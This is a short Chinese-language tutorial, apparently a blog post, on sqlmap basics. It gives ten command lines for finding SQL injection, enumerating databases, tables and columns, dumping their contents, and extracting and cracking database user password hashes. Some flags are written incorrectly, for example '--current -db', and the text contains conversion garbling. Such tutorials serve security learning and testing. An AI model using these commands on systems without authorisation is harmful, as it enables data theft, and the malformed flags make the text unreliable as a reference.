1、SQLMAP入門

1、SQLMAP入門

1、判斷是否存在注入

sqlmap.py -u 網址/id=1

id=1不可缺乏。當注入點後面的參數大於兩個時。須要加雙引號，

sqlmap.py -u "網址/id=1&uid=1"

2、判斷文本中的請求是否存在注入

從文本中加載http請求，SQLMAP能夠從一個文本文件中獲取http請求，這樣能夠不設置其它參數，txt文件中的內容爲web數據包。判斷是否存在注入的命令：

sqlmap.py -r desktop/1.txt

3、查詢當前用戶下的全部數據庫

該命令是肯定網站存在注入後，用於查詢當前用戶下的全部數據庫。若是當前用戶有權限讀取包含全部數據庫列表信息的表，使用該命令就能夠列出全部數據庫。

sqlmap.py -u 網址 --dbs、

當繼續注入時，--dbs縮寫成-D xxx，其意思是在xxx數據庫中繼續查詢其餘數據。

4、獲取數據庫的表名

該命令的做用是查詢完數據庫後，查詢指定數據庫中全部的表名。若是在該命令中不加入-D參數來指定某一個具體的數據庫，那麼SQLMap會列出數據庫中全部庫的表。

sqlmap.py -u "網址「 -D 數據庫名 --tables

當繼續注入時，--tables縮寫成-T，意思時=是在某表中繼續查詢。

5、獲取表中的字段名

該命令的做用是查詢完表名後，查詢該表中全部的字段名。

sqlmap.py -u 網址 -D 數據庫名 -T 表名 --columns

在後續注入中，--colums縮寫成 -C 。

6、獲取字段內容

該命令是查詢完字段名以後，獲取該字段中具體的數據信息。

sqlmap.py -u 網址 -D 數據庫名 -T表名 -C字段名 --dump

7、獲取數據庫的全部用戶

該命令的做用是列出數據庫的全部用戶。若是當前用戶有權限讀取包含全部用戶的表的權限是，使用該命令就能夠列出全部管理用戶。

sqlmap.py -u 網址 --users

8、獲取數據庫用戶的密碼

該命令的做用是列出數據庫用戶的密碼。若是當前用戶有讀取包含用戶密碼的權限，SQLMAP會先例舉出用戶，而後列出Hash，並嘗試破解。

sqlmap.py -u 網址 --passwords

9、獲取當前網站數據的名稱

使用該命令能夠列出當前網站使用的數據庫

sqlmap.py -u 網址 --current -db

10、獲取當前網站數據庫的用戶名稱

使用該命令能夠列出當前網站使用的數據庫用戶。

sqlmap.py -u 網址 --current -user